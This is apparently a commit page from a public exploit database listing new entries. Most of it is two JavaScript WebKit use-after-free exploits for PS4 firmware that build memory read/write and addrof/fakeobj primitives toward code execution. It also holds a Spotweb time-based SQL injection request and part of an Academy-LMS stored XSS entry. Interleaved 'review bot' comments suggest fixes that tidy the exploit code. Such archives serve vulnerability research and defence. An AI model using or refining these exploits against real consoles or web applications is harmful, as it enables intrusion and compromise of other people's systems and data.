DB: 2020-12-22

15 changes to exploits/shellcodes

Queue Management System 4.0.0 - _Add User_ Stored XSS
Spotweb 1.4.9 - 'search' SQL Injection
Academy-LMS 4.3 - Stored XSS
Spiceworks 7.5 - HTTP Header Injection

Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload
SCO Openserver 5.0.7 - 'section' Reflected XSS
SCO Openserver 5.0.7 - 'outputform' Command Injection
Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS
Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS
Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS
Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS
Point of Sale System 1.0 - Multiple Stored XSS
Online Marriage Registration System 1.0 - 'searchdata' SQL Injection
Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)
Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)
Offensive Security 2020-12-22 05:01:58 +00:00
parent cb83a6e2dd
commit cd30696d15
16 changed files with 1740 additions and 0 deletions


@ -0,0 +1,422 @@
const OFFSET_ELEMENT_REFCOUNT = 0x10;
const OFFSET_JSAB_VIEW_VECTOR = 0x10;
const OFFSET_JSAB_VIEW_LENGTH = 0x18;
const OFFSET_LENGTH_STRINGIMPL = 0x04;
const OFFSET_HTMLELEMENT_REFCOUNT = 0x14;
const LENGTH_ARRAYBUFFER = 0x8;
const LENGTH_STRINGIMPL = 0x14;
const LENGTH_JSVIEW = 0x20;
const LENGTH_VALIDATION_MESSAGE = 0x30;
const LENGTH_TIMER = 0x48;
const LENGTH_HTMLTEXTAREA = 0xd8;
const SPRAY_ELEM_SIZE = 0x6000;
const SPRAY_STRINGIMPL = 0x1000;
const NB_FRAMES = 0xfa0;
const NB_REUSE = 0x8000;
var g_arr_ab_1 = [];
var g_arr_ab_2 = [];
var g_arr_ab_3 = [];
var g_frames = [];
var g_relative_read = null;
var g_relative_rw = null;
var g_ab_slave = null;
var g_ab_index = null;
var g_timer_leak = null;
var g_jsview_leak = null;
var g_message_heading_leak = null;
var g_message_body_leak = null;
var g_obj_str = {};
var g_rows1 = '1px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "1px";
var g_rows2 = '2px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "2px";
var g_round = 1;
var g_input = null;
var guess_htmltextarea_addr = new Int64("0x2070a00d8");
/* Executed after deleteBubbleTree */
function setupRW() {
/* Now the m_length of the JSArrayBufferView should be 0xffffff01 */
for (let i = 0; i < g_arr_ab_3.length; i++) {
if (g_arr_ab_3[i].length > 0xff) {
g_relative_rw = g_arr_ab_3[i];
debug_log("[+] Succesfully got a relative R/W");
break;
}
}
if (g_relative_rw === null)
die("[!] Failed to setup a relative R/W primitive");
debug_log("[+] Setting up arbitrary R/W");
/* Retrieving the ArrayBuffer address using the relative read */
let diff = g_jsview_leak.sub(g_timer_leak).low32() - LENGTH_STRINGIMPL + 1;
let ab_addr = new Int64(str2array(g_relative_read, 8, diff + OFFSET_JSAB_VIEW_VECTOR));
/* Does the next JSObject is a JSView? Otherwise we target the previous JSObject */
let ab_index = g_jsview_leak.sub(ab_addr).low32();
if (g_relative_rw[ab_index + LENGTH_JSVIEW + OFFSET_JSAB_VIEW_LENGTH] === LENGTH_ARRAYBUFFER)
g_ab_index = ab_index + LENGTH_JSVIEW;
else
g_ab_index = ab_index - LENGTH_JSVIEW;
/* Overding the length of one JSArrayBufferView with a known value */
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0x41;
/* Looking for the slave JSArrayBufferView */
for (let i = 0; i < g_arr_ab_3.length; i++) {
if (g_arr_ab_3[i].length === 0x41) {
g_ab_slave = g_arr_ab_3[i];
g_arr_ab_3 = null;
break;
}
}
if (g_ab_slave === null)
die("[!] Didn't found the slave JSArrayBufferView");
/* Extending the JSArrayBufferView length */
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 1] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 2] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 3] = 0xff;
debug_log("[+] Testing arbitrary R/W");
let saved_vtable = read64(guess_htmltextarea_addr);
write64(guess_htmltextarea_addr, new Int64("0x4141414141414141"));
if (!read64(guess_htmltextarea_addr).equals("0x4141414141414141"))
die("[!] Failed to setup arbitrary R/W primitive");
debug_log("[+] Succesfully got arbitrary R/W!");
/* Restore the overidden vtable pointer */
write64(guess_htmltextarea_addr, saved_vtable);
/* Cleanup memory */
cleanup();
/* Getting code execution */
/* ... */
}
function read(addr, length) {
for (let i = 0; i < 8; i++)
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
let arr = [];
for (let i = 0; i < length; i++)
arr.push(g_ab_slave[i]);
return arr;
}
function read64(addr) {
return new Int64(read(addr, 8));
}
function write(addr, data) {
for (let i = 0; i < 8; i++)
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
for (let i = 0; i < data.length; i++)
g_ab_slave[i] = data[i];
}
function write64(addr, data) {
write(addr, data.bytes());
}
function cleanup() {
select1.remove();
select1 = null;
input1.remove();
input1 = null;
input2.remove();
input2 = null;
input3.remove();
input3 = null;
div1.remove();
div1 = null;
g_input = null;
g_rows1 = null;
g_rows2 = null;
g_frames = null;
}
/*
* Executed after buildBubbleTree
* and before deleteBubbleTree
*/
function confuseTargetObjRound2() {
if (findTargetObj() === false)
die("[!] Failed to reuse target obj.");
g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble();
setTimeout(setupRW, 6000);
}
/* Executed after deleteBubbleTree */
function leakJSC() {
debug_log("[+] Looking for the smashed StringImpl...");
var arr_str = Object.getOwnPropertyNames(g_obj_str);
/* Looking for the smashed string */
for (let i = arr_str.length - 1; i > 0; i--) {
if (arr_str[i].length > 0xff) {
debug_log("[+] StringImpl corrupted successfully");
g_relative_read = arr_str[i];
g_obj_str = null;
break;
}
}
if (g_relative_read === null)
die("[!] Failed to setup a relative read primitive");
debug_log("[+] Got a relative read");
let ab = new ArrayBuffer(LENGTH_ARRAYBUFFER);
/* Spraying JSView */
let tmp = [];
for (let i = 0; i < 0x10000; i++) {
/* The last allocated are more likely to be allocated after our relative read */
if (i >= 0xfc00)
g_arr_ab_3.push(new Uint8Array(ab));
else
tmp.push(new Uint8Array(ab));
}
tmp = null;
/*
* Force JSC ref on FastMalloc Heap
* https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151
*/
var props = [];
for (var i = 0; i < 0x400; i++) {
props.push({ value: 0x42424242 });
props.push({ value: g_arr_ab_3[i] });
}
/*
* /!\
* This part must avoid as much as possible fastMalloc allocation
* to avoid re-using the targeted object
* /!\
*/
/* Use relative read to find our JSC obj */
/* We want a JSView that is allocated after our relative read */
while (g_jsview_leak === null) {
Object.defineProperties({}, props);
for (let i = 0; i < 0x800000; i++) {
var v = undefined;
if (g_relative_read.charCodeAt(i) === 0x42 &&
g_relative_read.charCodeAt(i + 0x01) === 0x42 &&
g_relative_read.charCodeAt(i + 0x02) === 0x42 &&
g_relative_read.charCodeAt(i + 0x03) === 0x42) {
if (g_relative_read.charCodeAt(i + 0x08) === 0x00 &&
g_relative_read.charCodeAt(i + 0x0f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x10) === 0x00 &&
g_relative_read.charCodeAt(i + 0x17) === 0x00 &&
g_relative_read.charCodeAt(i + 0x18) === 0x0e &&
g_relative_read.charCodeAt(i + 0x1f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x28) === 0x00 &&
g_relative_read.charCodeAt(i + 0x2f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x30) === 0x00 &&
g_relative_read.charCodeAt(i + 0x37) === 0x00 &&
g_relative_read.charCodeAt(i + 0x38) === 0x0e &&
g_relative_read.charCodeAt(i + 0x3f) === 0x00)
v = new Int64(str2array(g_relative_read, 8, i + 0x20));
else if (g_relative_read.charCodeAt(i + 0x10) === 0x42 &&
g_relative_read.charCodeAt(i + 0x11) === 0x42 &&
g_relative_read.charCodeAt(i + 0x12) === 0x42 &&
g_relative_read.charCodeAt(i + 0x13) === 0x42)
v = new Int64(str2array(g_relative_read, 8, i + 8));
}
if (v !== undefined && v.greater(g_timer_leak) && v.sub(g_timer_leak).hi32() === 0x0) {
g_jsview_leak = v;
props = null;
break;
}
}
}
/*
* /!\
* Critical part ended-up here
* /!\
*/
debug_log("[+] JSArrayBufferView: " + g_jsview_leak);
/* Run the exploit again */
prepareUAF();
}
/*
* Executed after buildBubbleTree
* and before deleteBubbleTree
*/
function confuseTargetObjRound1() {
/* Force allocation of StringImpl obj. beyond Timer address */
sprayStringImpl(SPRAY_STRINGIMPL, SPRAY_STRINGIMPL * 2);
/* Checking for leaked data */
if (findTargetObj() === false)
die("[!] Failed to reuse target obj.");
dumpTargetObj();
g_fake_validation_message[4] = g_timer_leak.add(LENGTH_TIMER * 8 + OFFSET_LENGTH_STRINGIMPL + 1 - OFFSET_ELEMENT_REFCOUNT).asDouble();
/*
* The timeout must be > 5s because deleteBubbleTree is scheduled to run in
* the next 5s
*/
setTimeout(leakJSC, 6000);
}
function handle2() {
/* focus elsewhere */
input2.focus();
}
function reuseTargetObj() {
/* Delete ValidationMessage instance */
document.body.appendChild(g_input);
/*
* Free ValidationMessage neighboors.
* SmallLine is freed -> SmallPage is cached
*/
for (let i = NB_FRAMES / 2 - 0x10; i < NB_FRAMES / 2 + 0x10; i++)
g_frames[i].setAttribute("rows", ',');
/* Get back target object */
for (let i = 0; i < NB_REUSE; i++) {
let ab = new ArrayBuffer(LENGTH_VALIDATION_MESSAGE);
let view = new Float64Array(ab);
view[0] = guess_htmltextarea_addr.asDouble(); // m_element
view[3] = guess_htmltextarea_addr.asDouble(); // m_bubble
g_arr_ab_1.push(view);
}
if (g_round == 1) {
/*
* Spray a couple of StringImpl obj. prior to Timer allocation
* This will force Timer allocation on same SmallPage as our Strings
*/
sprayStringImpl(0, SPRAY_STRINGIMPL);
g_frames = [];
g_round += 1;
g_input = input3;
setTimeout(confuseTargetObjRound1, 10);
} else {
setTimeout(confuseTargetObjRound2, 10);
}
}
function dumpTargetObj() {
debug_log("[+] m_timer: " + g_timer_leak);
debug_log("[+] m_messageHeading: " + g_message_heading_leak);
debug_log("[+] m_messageBody: " + g_message_body_leak);
}
function findTargetObj() {
for (let i = 0; i < g_arr_ab_1.length; i++) {
if (!Int64.fromDouble(g_arr_ab_1[i][2]).equals(Int64.Zero)) {
debug_log("[+] Found fake ValidationMessage");
if (g_round === 2) {
g_timer_leak = Int64.fromDouble(g_arr_ab_1[i][2]);
g_message_heading_leak = Int64.fromDouble(g_arr_ab_1[i][4]);
g_message_body_leak = Int64.fromDouble(g_arr_ab_1[i][5]);
g_round++;
}
g_fake_validation_message = g_arr_ab_1[i];
g_arr_ab_1 = [];
return true;
}
}
return false;
}
function prepareUAF() {
g_input.setCustomValidity("ps4");
for (let i = 0; i < NB_FRAMES; i++) {
var element = document.createElement("frameset");
g_frames.push(element);
}
g_input.reportValidity();
var div = document.createElement("div");
document.body.appendChild(div);
div.appendChild(g_input);
/* First half spray */
for (let i = 0; i < NB_FRAMES / 2; i++)
g_frames[i].setAttribute("rows", g_rows1);
/* Instantiate target obj */
g_input.reportValidity();
/* ... and the second half */
for (let i = NB_FRAMES / 2; i < NB_FRAMES; i++)
g_frames[i].setAttribute("rows", g_rows2);
g_input.setAttribute("onfocus", "reuseTargetObj()");
g_input.autofocus = true;
}
/* HTMLElement spray */
function sprayHTMLTextArea() {
debug_log("[+] Spraying HTMLTextareaElement ...");
let textarea_div_elem = document.createElement("div");
document.body.appendChild(textarea_div_elem);
textarea_div_elem.id = "div1";
var element = document.createElement("textarea");
/* Add a style to avoid textarea display */
element.style.cssText = 'display:block-inline;height:1px;width:1px;visibility:hidden;';
/*
* This spray is not perfect, "element.cloneNode" will trigger a fastMalloc
* allocation of the node attributes and an IsoHeap allocation of the
* Element. The virtual page layout will look something like that:
* [IsoHeap] [fastMalloc] [IsoHeap] [fastMalloc] [IsoHeap] [...]
*/
for (let i = 0; i < SPRAY_ELEM_SIZE; i++)
textarea_div_elem.appendChild(element.cloneNode());
}
/* StringImpl Spray */
function sprayStringImpl(start, end) {
for (let i = start; i < end; i++) {
let s = new String("A".repeat(LENGTH_TIMER - LENGTH_STRINGIMPL - 5) + i.toString().padStart(5, "0"));
g_obj_str[s] = 0x1337;
}
}
function go() {
/* Init spray */
sprayHTMLTextArea();
g_input = input1;
/* Shape heap layout for obj. reuse */
prepareUAF();
}
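Review bot: `g_fake_validation_message` is assigned in confuseTargetObjRound2, confuseTargetObjRound1 and findTargetObj but is never declared, so it exists only as an implicit global and would throw under `'use strict'`; declare it with the rest of the state at the top of the file, `var g_fake_validation_message = null;`, next to `g_input`. The same undeclared global appears in the second JavaScript file of this commit. `if (g_round == 1)` in reuseTargetObj uses loose equality while findTargetObj compares with `g_round === 2`; `if (g_round === 1)` keeps the two consistent. The hunk header counts 422 added lines while fewer are shown, so blank lines were presumably dropped when the page was rendered.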


@ -0,0 +1,513 @@
const OFFSET_ELEMENT_REFCOUNT = 0x10;
const OFFSET_JSAB_VIEW_VECTOR = 0x10;
const OFFSET_JSAB_VIEW_LENGTH = 0x18;
const OFFSET_LENGTH_STRINGIMPL = 0x04;
const OFFSET_HTMLELEMENT_REFCOUNT = 0x14;
const LENGTH_ARRAYBUFFER = 0x8;
const LENGTH_STRINGIMPL = 0x14;
const LENGTH_JSVIEW = 0x20;
const LENGTH_VALIDATION_MESSAGE = 0x30;
const LENGTH_TIMER = 0x48;
const LENGTH_HTMLTEXTAREA = 0xd8;
const SPRAY_ELEM_SIZE = 0x6000;
const SPRAY_STRINGIMPL = 0x1000;
const NB_FRAMES = 0xfa0;
const NB_REUSE = 0x8000;
var g_arr_ab_1 = [];
var g_arr_ab_2 = [];
var g_arr_ab_3 = [];
var g_frames = [];
var g_relative_read = null;
var g_relative_rw = null;
var g_ab_slave = null;
var g_ab_index = null;
var g_timer_leak = null;
var g_jsview_leak = null;
var g_jsview_butterfly = null;
var g_message_heading_leak = null;
var g_message_body_leak = null;
var g_obj_str = {};
var g_rows1 = '1px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "1px";
var g_rows2 = '2px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "2px";
var g_round = 1;
var g_input = null;
var guess_htmltextarea_addr = new Int64("0x2031b00d8");
var master_b = new Uint32Array(2);
var slave_b = new Uint32Array(2);
var slave_addr;
var slave_buf_addr;
var master_addr;
/* Executed after deleteBubbleTree */
function setupRW() {
/* Now the m_length of the JSArrayBufferView should be 0xffffff01 */
for (let i = 0; i < g_arr_ab_3.length; i++) {
if (g_arr_ab_3[i].length > 0xff) {
g_relative_rw = g_arr_ab_3[i];
debug_log("[+] Succesfully got a relative R/W");
break;
}
}
if (g_relative_rw === null)
die("[!] Failed to setup a relative R/W primitive");
debug_log("[+] Setting up arbitrary R/W");
/* Retrieving the ArrayBuffer address using the relative read */
let diff = g_jsview_leak.sub(g_timer_leak).low32() - LENGTH_STRINGIMPL + 1;
let ab_addr = new Int64(str2array(g_relative_read, 8, diff + OFFSET_JSAB_VIEW_VECTOR));
/* Does the next JSObject is a JSView? Otherwise we target the previous JSObject */
let ab_index = g_jsview_leak.sub(ab_addr).low32();
if (g_relative_rw[ab_index + LENGTH_JSVIEW + OFFSET_JSAB_VIEW_LENGTH] === LENGTH_ARRAYBUFFER)
g_ab_index = ab_index + LENGTH_JSVIEW;
else
g_ab_index = ab_index - LENGTH_JSVIEW;
/* Overding the length of one JSArrayBufferView with a known value */
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0x41;
/* Looking for the slave JSArrayBufferView */
for (let i = 0; i < g_arr_ab_3.length; i++) {
if (g_arr_ab_3[i].length === 0x41) {
g_ab_slave = g_arr_ab_3[i];
g_arr_ab_3 = null;
break;
}
}
if (g_ab_slave === null)
die("[!] Didn't found the slave JSArrayBufferView");
/* Extending the JSArrayBufferView length */
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 1] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 2] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 3] = 0xff;
debug_log("[+] Testing arbitrary R/W");
let saved_vtable = read64(guess_htmltextarea_addr);
write64(guess_htmltextarea_addr, new Int64("0x4141414141414141"));
if (!read64(guess_htmltextarea_addr).equals("0x4141414141414141"))
die("[!] Failed to setup arbitrary R/W primitive");
debug_log("[+] Succesfully got arbitrary R/W!");
/* Restore the overidden vtable pointer */
write64(guess_htmltextarea_addr, saved_vtable);
/* Cleanup memory */
cleanup();
/* Set up addrof/fakeobj primitives */
g_ab_slave.leakme = 0x1337;
var bf = 0;
for(var i = 15; i >= 8; i--)
bf = 256 * bf + g_relative_rw[g_ab_index + i];
g_jsview_butterfly = new Int64(bf);
if(!read64(g_jsview_butterfly.sub(16)).equals(new Int64("0xffff000000001337")))
die("[!] Failed to setup addrof/fakeobj primitives");
debug_log("[+] Succesfully got addrof/fakeobj");
/* Getting code execution */
/* ... */
var leak_slave = addrof(slave_b);
var slave_addr = read64(leak_slave.add(0x10));
og_slave_addr = new int64(slave_addr.low32(), slave_addr.hi32());
var leak_master = addrof(master_b);
write64(leak_master.add(0x10), leak_slave.add(0x10));
var prim = {
write8: function(addr, val) {
master_b[0] = addr.low;
master_b[1] = addr.hi;
if(val instanceof int64) {
slave_b[0] = val.low;
slave_b[1] = val.hi;
}
else {
slave_b[0] = val;
slave_b[1] = 0;
}
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
},
write4: function(addr, val) {
master_b[0] = addr.low;
master_b[1] = addr.hi;
slave_b[0] = val;
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
},
read8: function(addr) {
master_b[0] = addr.low;
master_b[1] = addr.hi;
var r = new int64(slave_b[0], slave_b[1]);
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
return r;
},
read4: function(addr) {
master_b[0] = addr.low;
master_b[1] = addr.hi;
var r = slave_b[0];
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
return r;
},
leakval: function(val) {
g_ab_slave.leakme = val;
master_b[0] = g_jsview_butterfly.low32() - 0x10;
master_b[1] = g_jsview_butterfly.hi32();
var r = new int64(slave_b[0], slave_b[1]);
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
return r;
},
};
window.prim = prim;
setTimeout(stage2, 1000);
}
function read(addr, length) {
for (let i = 0; i < 8; i++)
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
let arr = [];
for (let i = 0; i < length; i++)
arr.push(g_ab_slave[i]);
return arr;
}
function read64(addr) {
return new Int64(read(addr, 8));
}
function write(addr, data) {
for (let i = 0; i < 8; i++)
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
for (let i = 0; i < data.length; i++)
g_ab_slave[i] = data[i];
}
function write64(addr, data) {
write(addr, data.bytes());
}
function addrof(obj) {
g_ab_slave.leakme = obj;
return read64(g_jsview_butterfly.sub(16));
}
function fakeobj(addr) {
write64(g_jsview_butterfly.sub(16), addr);
return g_ab_slave.leakme;
}
function cleanup() {
select1.remove();
select1 = null;
input1.remove();
input1 = null;
input2.remove();
input2 = null;
input3.remove();
input3 = null;
div1.remove();
div1 = null;
g_input = null;
g_rows1 = null;
g_rows2 = null;
g_frames = null;
}
/*
* Executed after buildBubbleTree
* and before deleteBubbleTree
*/
function confuseTargetObjRound2() {
if (findTargetObj() === false)
die("[!] Failed to reuse target obj.");
g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble();
setTimeout(setupRW, 6000);
}
/* Executed after deleteBubbleTree */
function leakJSC() {
debug_log("[+] Looking for the smashed StringImpl...");
var arr_str = Object.getOwnPropertyNames(g_obj_str);
/* Looking for the smashed string */
for (let i = arr_str.length - 1; i > 0; i--) {
if (arr_str[i].length > 0xff) {
debug_log("[+] StringImpl corrupted successfully");
g_relative_read = arr_str[i];
g_obj_str = null;
break;
}
}
if (g_relative_read === null)
die("[!] Failed to setup a relative read primitive");
debug_log("[+] Got a relative read");
var tmp_spray = {};
for(var i = 0; i < 100000; i++)
tmp_spray['Z'.repeat(8 * 2 * 8 - 5 - LENGTH_STRINGIMPL) + (''+i).padStart(5, '0')] = 0x1337;
let ab = new ArrayBuffer(LENGTH_ARRAYBUFFER);
/* Spraying JSView */
let tmp = [];
for (let i = 0; i < 0x10000; i++) {
/* The last allocated are more likely to be allocated after our relative read */
if (i >= 0xfc00)
g_arr_ab_3.push(new Uint8Array(ab));
else
tmp.push(new Uint8Array(ab));
}
tmp = null;
/*
* Force JSC ref on FastMalloc Heap
* https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151
*/
var props = [];
for (var i = 0; i < 0x400; i++) {
props.push({ value: 0x42424242 });
props.push({ value: g_arr_ab_3[i] });
}
/*
* /!\
* This part must avoid as much as possible fastMalloc allocation
* to avoid re-using the targeted object
* /!\
*/
/* Use relative read to find our JSC obj */
/* We want a JSView that is allocated after our relative read */
while (g_jsview_leak === null) {
Object.defineProperties({}, props);
for (let i = 0; i < 0x800000; i++) {
var v = undefined;
if (g_relative_read.charCodeAt(i) === 0x42 &&
g_relative_read.charCodeAt(i + 0x01) === 0x42 &&
g_relative_read.charCodeAt(i + 0x02) === 0x42 &&
g_relative_read.charCodeAt(i + 0x03) === 0x42) {
if (g_relative_read.charCodeAt(i + 0x08) === 0x00 &&
g_relative_read.charCodeAt(i + 0x0f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x10) === 0x00 &&
g_relative_read.charCodeAt(i + 0x17) === 0x00 &&
g_relative_read.charCodeAt(i + 0x18) === 0x0e &&
g_relative_read.charCodeAt(i + 0x1f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x28) === 0x00 &&
g_relative_read.charCodeAt(i + 0x2f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x30) === 0x00 &&
g_relative_read.charCodeAt(i + 0x37) === 0x00 &&
g_relative_read.charCodeAt(i + 0x38) === 0x0e &&
g_relative_read.charCodeAt(i + 0x3f) === 0x00)
v = new Int64(str2array(g_relative_read, 8, i + 0x20));
else if (g_relative_read.charCodeAt(i + 0x10) === 0x42 &&
g_relative_read.charCodeAt(i + 0x11) === 0x42 &&
g_relative_read.charCodeAt(i + 0x12) === 0x42 &&
g_relative_read.charCodeAt(i + 0x13) === 0x42)
v = new Int64(str2array(g_relative_read, 8, i + 8));
}
if (v !== undefined && v.greater(g_timer_leak) && v.sub(g_timer_leak).hi32() === 0x0) {
g_jsview_leak = v;
props = null;
break;
}
}
}
/*
* /!\
* Critical part ended-up here
* /!\
*/
debug_log("[+] JSArrayBufferView: " + g_jsview_leak);
/* Run the exploit again */
prepareUAF();
}
/*
* Executed after buildBubbleTree
* and before deleteBubbleTree
*/
function confuseTargetObjRound1() {
/* Force allocation of StringImpl obj. beyond Timer address */
sprayStringImpl(SPRAY_STRINGIMPL, SPRAY_STRINGIMPL * 2);
/* Checking for leaked data */
if (findTargetObj() === false)
die("[!] Failed to reuse target obj.");
dumpTargetObj();
g_fake_validation_message[4] = g_timer_leak.add(LENGTH_TIMER * 8 + OFFSET_LENGTH_STRINGIMPL + 1 - OFFSET_ELEMENT_REFCOUNT).asDouble();
/*
* The timeout must be > 5s because deleteBubbleTree is scheduled to run in
* the next 5s
*/
setTimeout(leakJSC, 6000);
}
function handle2() {
/* focus elsewhere */
input2.focus();
}
function reuseTargetObj() {
/* Delete ValidationMessage instance */
document.body.appendChild(g_input);
/*
* Free ValidationMessage neighboors.
* SmallLine is freed -> SmallPage is cached
*/
for (let i = NB_FRAMES / 2 - 0x10; i < NB_FRAMES / 2 + 0x10; i++)
g_frames[i].setAttribute("rows", ',');
/* Get back target object */
for (let i = 0; i < NB_REUSE; i++) {
let ab = new ArrayBuffer(LENGTH_VALIDATION_MESSAGE);
let view = new Float64Array(ab);
view[0] = guess_htmltextarea_addr.asDouble(); // m_element
view[3] = guess_htmltextarea_addr.asDouble(); // m_bubble
g_arr_ab_1.push(view);
}
if (g_round == 1) {
/*
* Spray a couple of StringImpl obj. prior to Timer allocation
* This will force Timer allocation on same SmallPage as our Strings
*/
sprayStringImpl(0, SPRAY_STRINGIMPL);
g_frames = [];
g_round += 1;
g_input = input3;
setTimeout(confuseTargetObjRound1, 10);
} else {
setTimeout(confuseTargetObjRound2, 10);
}
}
function dumpTargetObj() {
debug_log("[+] m_timer: " + g_timer_leak);
debug_log("[+] m_messageHeading: " + g_message_heading_leak);
debug_log("[+] m_messageBody: " + g_message_body_leak);
}
function findTargetObj() {
for (let i = 0; i < g_arr_ab_1.length; i++) {
if (!Int64.fromDouble(g_arr_ab_1[i][2]).equals(Int64.Zero)) {
debug_log("[+] Found fake ValidationMessage");
if (g_round === 2) {
g_timer_leak = Int64.fromDouble(g_arr_ab_1[i][2]);
g_message_heading_leak = Int64.fromDouble(g_arr_ab_1[i][4]);
g_message_body_leak = Int64.fromDouble(g_arr_ab_1[i][5]);
g_round++;
}
g_fake_validation_message = g_arr_ab_1[i];
g_arr_ab_1 = [];
return true;
}
}
return false;
}
function prepareUAF() {
g_input.setCustomValidity("ps4");
for (let i = 0; i < NB_FRAMES; i++) {
var element = document.createElement("frameset");
g_frames.push(element);
}
g_input.reportValidity();
var div = document.createElement("div");
document.body.appendChild(div);
div.appendChild(g_input);
/* First half spray */
for (let i = 0; i < NB_FRAMES / 2; i++)
g_frames[i].setAttribute("rows", g_rows1);
/* Instantiate target obj */
g_input.reportValidity();
/* ... and the second half */
for (let i = NB_FRAMES / 2; i < NB_FRAMES; i++)
g_frames[i].setAttribute("rows", g_rows2);
g_input.setAttribute("onfocus", "reuseTargetObj()");
g_input.autofocus = true;
}
/* HTMLElement spray */
function sprayHTMLTextArea() {
debug_log("[+] Spraying HTMLTextareaElement ...");
let textarea_div_elem = document.createElement("div");
document.body.appendChild(textarea_div_elem);
textarea_div_elem.id = "div1";
var element = document.createElement("textarea");
/* Add a style to avoid textarea display */
element.style.cssText = 'display:block-inline;height:1px;width:1px;visibility:hidden;';
/*
* This spray is not perfect, "element.cloneNode" will trigger a fastMalloc
* allocation of the node attributes and an IsoHeap allocation of the
* Element. The virtual page layout will look something like that:
* [IsoHeap] [fastMalloc] [IsoHeap] [fastMalloc] [IsoHeap] [...]
*/
for (let i = 0; i < SPRAY_ELEM_SIZE; i++)
textarea_div_elem.appendChild(element.cloneNode());
}
/* StringImpl Spray */
function sprayStringImpl(start, end) {
for (let i = start; i < end; i++) {
let s = new String("A".repeat(LENGTH_TIMER - LENGTH_STRINGIMPL - 5) + i.toString().padStart(5, "0"));
g_obj_str[s] = 0x1337;
}
}
function go() {
/* Init spray */
sprayHTMLTextArea();
g_input = input1;
/* Shape heap layout for obj. reuse */
prepareUAF();
}
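Review bot: In setupRW, `og_slave_addr` is assigned without a declaration and then read by every method of `prim`, so the primitives only work through an implicit global that `'use strict'` would reject; the line before it, `var slave_addr = read64(leak_slave.add(0x10));`, declares a local that shadows the top-level `slave_addr` declared beside `master_b`, which is therefore never set (nor are `slave_buf_addr` and `master_addr` used anywhere in the section as rendered). Add `var og_slave_addr = null;` to the top-level declarations and drop the local `var` so the existing `slave_addr` is the one assigned, or delete the unused top-level declarations. The lowercase `int64` used for `og_slave_addr` and inside `prim` (with `.low`/`.hi` fields) is a different constructor from the `Int64` used elsewhere (`.low32()`/`.hi32()`), presumably a second helper loaded alongside; a one-line comment naming where it and `stage2`, which setupRW schedules but this section does not define, come from would help the reader. The undeclared `g_fake_validation_message` raised on the first JavaScript file applies to this file as well.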


@ -0,0 +1,18 @@
# Exploit Title: Spotweb 1.4.9 - 'search' SQL Injection
# Google Dork: N/A
# Date: 20 December 2020
# Exploit Author: BouSalman
# Vendor Homepage: https://github.com/spotweb/spotweb
# Software Link: N/A
# Version: 1.4.9
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-35545
GET /?page=index&search[tree]=cat0_z0_c')+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))c)+AND+(' HTTP/1.1
Host: 192.168.99.151
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close


@ -0,0 +1,15 @@
# Exploit Title: Academy-LMS 4.3 - Stored XSS
# Date: 19/12/2020
# Vendor page: https://academy-lms.com/
# Version: 4.3
# Tested on Win10 and Google Chrome
# Exploit Author: Vinicius Alves
# XSS Payload: "><h1>STORED XSS</h1> (Scripts tag blocked)
1) Access LMS and log in to admin panel
2) Access courses page
3) Open course manager and SEO menu
